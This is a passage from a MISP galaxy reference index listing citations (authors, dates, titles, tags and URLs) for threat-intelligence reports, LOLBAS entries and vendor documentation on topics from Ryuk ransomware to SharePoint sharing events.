The tag is: misp-galaxy:references="Bleeping Computer - Ryuk WoL"

Table 15270. Table References

Links

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

DFIR Ryuk 2 Hour Speed Run November 2020

The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.

The tag is: misp-galaxy:references="DFIR Ryuk 2 Hour Speed Run November 2020"

Table 15271. Table References

Links

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

DFIR Ryuk’s Return October 2020

The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="DFIR Ryuk’s Return October 2020"

Table 15272. Table References

Links

https://thedfirreport.com/2020/10/08/ryuks-return/

Rhino S3 Ransomware Part 1

Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Rhino S3 Ransomware Part 1"

Table 15273. Table References

Links

https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/

Rhino S3 Ransomware Part 2

Gietzen, S. (n.d.). S3 Ransomware Part 2: Prevention and Defense. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Rhino S3 Ransomware Part 2"

Table 15274. Table References

Links

https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/

S3Recon GitHub

Travis Clarke. (2020, March 21). S3Recon GitHub. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="S3Recon GitHub"

Table 15275. Table References

Links

https://github.com/clarketm/s3recon

Dell Sakula

Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="Dell Sakula"

Table 15276. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/

Wine API samlib.dll

Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Wine API samlib.dll"

Table 15277. Table References

Links

https://source.winehq.org/WineAPI/samlib.html

Sophos SamSam Apr 2018

Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="Sophos SamSam Apr 2018"

Table 15278. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf

Symantec SamSam Oct 2018

Symantec Security Response Attack Investigation Team. (2018, October 30). SamSam: Targeted Ransomware Attacks Continue. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Symantec SamSam Oct 2018"

Table 15279. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks

Talos SamSam Jan 2018

Ventura, V. (2018, January 22). SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Talos SamSam Jan 2018"

Table 15280. Table References

Links

https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html

ANSSI Sandworm January 2021

ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="ANSSI Sandworm January 2021"

Table 15281. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

iSIGHT Sandworm 2014

Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="iSIGHT Sandworm 2014"

Table 15282. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

DOJ - Cisco Insider

DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco’s Network. Retrieved December 15, 2020.

The tag is: misp-galaxy:references="DOJ - Cisco Insider"

Table 15283. Table References

Links

https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network

ATT ScanBox

Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="ATT ScanBox"

Table 15284. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

Mandiant SCANdalous Jul 2020

Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Mandiant SCANdalous Jul 2020"

Table 15285. Table References

Links

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Securelist ScarCruft May 2019

GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Securelist ScarCruft May 2019"

Table 15286. Table References

Links

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

Sysdig ScarletEel 2.0

SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved July 12, 2023.

The tag is: misp-galaxy:references="Sysdig ScarletEel 2.0"

Table 15287. Table References

Links

https://sysdig.com/blog/scarleteel-2-0/

Sysdig ScarletEel 2.0 2023

Alessandro Brucato. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Sysdig ScarletEel 2.0 2023"

Table 15288. Table References

Links

https://sysdig.com/blog/scarleteel-2-0/

Scarlet Mimic Jan 2016

Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.

The tag is: misp-galaxy:references="Scarlet Mimic Jan 2016"

Table 15289. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

CrowdStrike Scattered Spider Profile

CrowdStrike. (n.d.). Scattered Spider. Retrieved July 5, 2023.

The tag is: misp-galaxy:references="CrowdStrike Scattered Spider Profile"

Table 15290. Table References

Links

https://www.crowdstrike.com/adversaries/scattered-spider/

U.S. CISA Scattered Spider November 16 2023

Cybersecurity and Infrastructure Security Agency. (2023, November 16). Scattered Spider. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="U.S. CISA Scattered Spider November 16 2023"

Table 15291. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

CrowdStrike Scattered Spider BYOVD January 2023

CrowdStrike. (2023, January 10). SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security. Retrieved July 5, 2023.

The tag is: misp-galaxy:references="CrowdStrike Scattered Spider BYOVD January 2023"

Table 15292. Table References

Links

https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/

Sc.exe - LOLBAS Project

LOLBAS. (2018, May 25). Sc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Sc.exe - LOLBAS Project"

Table 15293. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Sc/

TechNet Forum Scheduled Task Operational Setting

Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="TechNet Forum Scheduled Task Operational Setting"

Table 15294. Table References

Links

https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen

Kifarunix - Task Scheduling in Linux

Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.

The tag is: misp-galaxy:references="Kifarunix - Task Scheduling in Linux"

Table 15295. Table References

Links

https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/

TechNet Schtasks

Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="TechNet Schtasks"

Table 15296. Table References

Links

https://technet.microsoft.com/en-us/library/bb490996.aspx

Schtasks.exe - LOLBAS Project

LOLBAS. (2018, May 25). Schtasks.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Schtasks.exe - LOLBAS Project"

Table 15297. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Schtasks/

Wikipedia Screensaver

Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="Wikipedia Screensaver"

Table 15298. Table References

Links

https://en.wikipedia.org/wiki/Screensaver

CobaltStrike Scripted Web Delivery

Strategic Cyber, LLC. (n.d.). Scripted Web Delivery. Retrieved January 23, 2018.

The tag is: misp-galaxy:references="CobaltStrike Scripted Web Delivery"

Table 15299. Table References

Links

https://www.cobaltstrike.com/help-scripted-web-delivery

Cobalt Strike DCOM Jan 2017

Mudge, R. (2017, January 24). Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Cobalt Strike DCOM Jan 2017"

Table 15300. Table References

Links

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Scriptrunner.exe - LOLBAS Project

LOLBAS. (2018, May 25). Scriptrunner.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Scriptrunner.exe - LOLBAS Project"

Table 15301. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/

Scrobj.dll - LOLBAS Project

LOLBAS. (2021, January 7). Scrobj.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Scrobj.dll - LOLBAS Project"

Table 15302. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Scrobj/

Microsoft SDelete July 2016

Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.

The tag is: misp-galaxy:references="Microsoft SDelete July 2016"

Table 15303. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

Sean Metcalf Twitter DNS Records

Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Sean Metcalf Twitter DNS Records"

Table 15304. Table References

Links

https://twitter.com/PyroTek3/status/1126487227712921600/photo/1

Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="AWS CloudTrail Search"

Table 15305. Table References

Links

https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/

Group IB Cobalt Aug 2017

Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Group IB Cobalt Aug 2017"

Table 15306. Table References

Links

https://www.group-ib.com/blog/cobalt

GitHub SHB Credential Guard

NSA IAD. (2017, April 20). Secure Host Baseline - Credential Guard. Retrieved April 25, 2017.

The tag is: misp-galaxy:references="GitHub SHB Credential Guard"

Table 15307. Table References

Links

https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard

Secure Host Baseline EMET

National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.

The tag is: misp-galaxy:references="Secure Host Baseline EMET"

Table 15308. Table References

Links

https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

TechNet Secure Boot Process

Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.

The tag is: misp-galaxy:references="TechNet Secure Boot Process"

Table 15309. Table References

Links

https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process

SecureWorks August 2019

SecureWorks. (2019, August 27) LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019

The tag is: misp-galaxy:references="SecureWorks August 2019"

Table 15310. Table References

Links

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

Securing bash history

Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Securing bash history"

Table 15311. Table References

Links

http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

Microsoft Securing Privileged Access

Plett, C., Poggemeyer, L. (2012, October 26). Securing Privileged Access Reference Material. Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft Securing Privileged Access"

Table 15312. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

Berkley Secure

Berkeley Security, University of California. (n.d.). Securing Remote Desktop for System Administrators. Retrieved November 4, 2014.

The tag is: misp-galaxy:references="Berkley Secure"

Table 15313. Table References

Links

https://security.berkeley.edu/node/94

Cisco Securing SNMP

Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Securing SNMP"

Table 15314. Table References

Links

https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html

ADSecurity Windows Secure Baseline

Metcalf, S. (2016, October 21). Securing Windows Workstations: Developing a Secure Baseline. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="ADSecurity Windows Secure Baseline"

Table 15315. Table References

Links

https://adsecurity.org/?p=3299

Morphisec ShellTea June 2019

Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.

The tag is: misp-galaxy:references="Morphisec ShellTea June 2019"

Table 15316. Table References

Links

http://blog.morphisec.com/security-alert-fin8-is-back

Carbon Black Obfuscation Sept 2016

Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="Carbon Black Obfuscation Sept 2016"

Table 15317. Table References

Links

https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/

Havana authentication bug

Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Havana authentication bug"

Table 15318. Table References

Links

http://lists.openstack.org/pipermail/openstack/2013-December/004138.html

Microsoft Trust Considerations Nov 2014

Microsoft. (2014, November 19). Security Considerations for Trusts. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Trust Considerations Nov 2014"

Table 15319. Table References

Links

https://technet.microsoft.com/library/cc755321.aspx

AWS Sec Groups VPC

Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="AWS Sec Groups VPC"

Table 15320. Table References

Links

https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html

Microsoft SID

Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft SID"

Table 15321. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx

Schneider Electric USB Malware

Schneider Electric. (2018, August 24). Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Schneider Electric USB Malware"

Table 15322. Table References

Links

https://www.se.com/ww/en/download/document/SESN-2018-236-01/

Microsoft Security Subsystem

Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Security Subsystem"

Table 15323. Table References

Links

https://technet.microsoft.com/library/cc961760.aspx

CISA IDN ST05-016

CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="CISA IDN ST05-016"

Table 15324. Table References

Links

https://us-cert.cisa.gov/ncas/tips/ST05-016

AADInternals zure AD Federated Domain

Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="AADInternals zure AD Federated Domain"

Table 15325. Table References

Links

https://o365blog.com/post/federation-vulnerability/

Azure AD Federation Vulnerability

Dr. Nestori Syynimaa.. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="Azure AD Federation Vulnerability"

Table 15326. Table References

Links

https://o365blog.com/post/federation-vulnerability/

ESET Sednit July 2015

ESET Research. (2015, July 10). Sednit APT Group Meets Hacking Team. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="ESET Sednit July 2015"

Table 15327. Table References

Links

http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/

ESET Sednit USBStealer 2014

Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.

The tag is: misp-galaxy:references="ESET Sednit USBStealer 2014"

Table 15328. Table References

Links

http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/

ESET Sednit 2017 Activity

ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="ESET Sednit 2017 Activity"

Table 15329. Table References

Links

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

ESET Zebrocy Nov 2018

ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.

The tag is: misp-galaxy:references="ESET Zebrocy Nov 2018"

Table 15330. Table References

Links

https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/

Symantec MuddyWater Dec 2018

Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.

The tag is: misp-galaxy:references="Symantec MuddyWater Dec 2018"

Table 15331. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

SanDisk SMART

SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.

The tag is: misp-galaxy:references="SanDisk SMART"

SELinux official

SELinux Project. (2017, November 30). SELinux Project Wiki. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="SELinux official"

Table 15332. Table References

Links

https://selinuxproject.org/page/Main_Page

Microsoft SendNotifyMessage function

Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft SendNotifyMessage function"

Table 15333. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

DFIR Report Gootloader

The DFIR Report. (2022, May 9). SEO Poisoning – A Gootloader Story. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="DFIR Report Gootloader"

Table 15334. Table References

Links

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

MalwareBytes SEO

Arntz, P. (2018, May 29). SEO poisoning: Is it worth it?. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="MalwareBytes SEO"

Table 15335. Table References

Links

https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it

Sophos Attachment

Ducklin, P. (2020, October 2). Serious Security: Phishing without links – when phishers bring along their own web pages. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Sophos Attachment"

Table 15336. Table References

Links

https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/

ProofPoint Serpent

Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="ProofPoint Serpent"

Table 15337. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Wikipedia Server Message Block

Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Wikipedia Server Message Block"

Table 15338. Table References

Links

https://en.wikipedia.org/wiki/Server_Message_Block

Wikipedia SMB

Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.

The tag is: misp-galaxy:references="Wikipedia SMB"

Table 15339. Table References

Links

https://en.wikipedia.org/wiki/Server_Message_Block

Proofpoint TA505 Jan 2019

Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 Jan 2019"

Table 15340. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Kubernetes Service Accounts Security

Kubernetes. (n.d.). Service Accounts. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Kubernetes Service Accounts Security"

Table 15341. Table References

Links

https://kubernetes.io/docs/concepts/security/service-accounts/

Microsoft Service Control Manager

Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Microsoft Service Control Manager"

Table 15342. Table References

Links

https://docs.microsoft.com/windows/win32/services/service-control-manager

Rapid7 Service Persistence 22JUNE2016

Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Rapid7 Service Persistence 22JUNE2016"

Table 15343. Table References

Links

https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Microsoft SPN

Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="Microsoft SPN"

Table 15344. Table References

Links

https://msdn.microsoft.com/library/ms677949.aspx

Microsoft SetSPN

Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.

The tag is: misp-galaxy:references="Microsoft SetSPN"

Table 15345. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

Twitter Service Recovery Nov 2017

The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Twitter Service Recovery Nov 2017"

Table 15346. Table References

Links

https://twitter.com/r0wdy_/status/936365549553991680

Tweet Registry Perms Weakness

@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Tweet Registry Perms Weakness"

Table 15347. Table References

Links

https://twitter.com/r0wdy_/status/936365549553991680

TechNet Services

Microsoft. (n.d.). Services. Retrieved June 7, 2016.

The tag is: misp-galaxy:references="TechNet Services"

Table 15348. Table References

Links

https://technet.microsoft.com/en-us/library/cc772408.aspx

Krebs Access Brokers Fortune 500

Brian Krebs. (2012, October 22). Service Sells Access to Fortune 500 Firms. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="Krebs Access Brokers Fortune 500"

Table 15349. Table References

Links

https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/

Medium Authentication Tokens

Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Medium Authentication Tokens"

Table 15350. Table References

Links

https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4

Microsoft Set-InboxRule

Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="Microsoft Set-InboxRule"

Table 15351. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps

Setres.exe - LOLBAS Project

LOLBAS. (2022, October 21). Setres.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Setres.exe - LOLBAS Project"

Table 15352. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Setres/

Microsoft Process Wide Com Keys

Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft Process Wide Com Keys"

Table 15353. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

SettingSyncHost.exe - LOLBAS Project

LOLBAS. (2021, August 26). SettingSyncHost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="SettingSyncHost.exe - LOLBAS Project"

Table 15354. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/

Petri Logon Script AD

Daniel Petri. (2009, January 8). Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008. Retrieved November 15, 2019.

The tag is: misp-galaxy:references="Petri Logon Script AD"

Table 15355. Table References

Links

https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008

AWS Setting Up Run Command

AWS. (n.d.). Setting up Run Command. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="AWS Setting Up Run Command"

Table 15356. Table References

Links

https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command-setting-up.html

VNC Authentication

Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="VNC Authentication"

Table 15357. Table References

Links

https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication

MacOS VNC software for Remote Desktop

Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="MacOS VNC software for Remote Desktop"

Table 15358. Table References

Links

https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac

Setupapi.dll - LOLBAS Project

LOLBAS. (2018, May 25). Setupapi.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Setupapi.dll - LOLBAS Project"

Table 15359. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Setupapi/

Microsoft Service Recovery Feb 2013

Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Microsoft Service Recovery Feb 2013"

Table 15360. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)

Microsoft SetWindowLong function

Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft SetWindowLong function"

Table 15361. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx

Securelist ShadowPad Aug 2017

GReAT. (2017, August 15). ShadowPad in corporate networks. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="Securelist ShadowPad Aug 2017"

Table 15362. Table References

Links

https://securelist.com/shadowpad-in-corporate-networks/81432/

Kaspersky ShadowPad Aug 2017

Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="Kaspersky ShadowPad Aug 2017"

Table 15363. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf

Palo Alto Shamoon Nov 2016

Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="Palo Alto Shamoon Nov 2016"

Table 15364. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

Unit 42 Shamoon3 2018

Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Unit 42 Shamoon3 2018"

Table 15365. Table References

Links

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

McAfee Shamoon December19 2018

Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="McAfee Shamoon December19 2018"

Table 15366. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/

McAfee Shamoon December 2018

Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020.

The tag is: misp-galaxy:references="McAfee Shamoon December 2018"

Table 15367. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/

TechNet Shared Folder

Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="TechNet Shared Folder"

Table 15368. Table References

Links

https://technet.microsoft.com/library/cc770880.aspx

AWS EBS Snapshot Sharing

Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="AWS EBS Snapshot Sharing"

Table 15369. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html

Linux Shared Libraries

Wheeler, D. (2003, April 11). Shared Libraries. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Linux Shared Libraries"

Table 15370. Table References

Links

https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

TLDP Shared Libraries

The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.

The tag is: misp-galaxy:references="TLDP Shared Libraries"

Table 15371. Table References

Links

https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

Phrack halfdead 1997

halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Phrack halfdead 1997"

Table 15372. Table References

Links

http://phrack.org/issues/51/8.html

Wikipedia Shared Resource

Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="Wikipedia Shared Resource"

Table 15373. Table References

Links

https://en.wikipedia.org/wiki/Shared_resource

Sharepoint Sharing Events

Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.

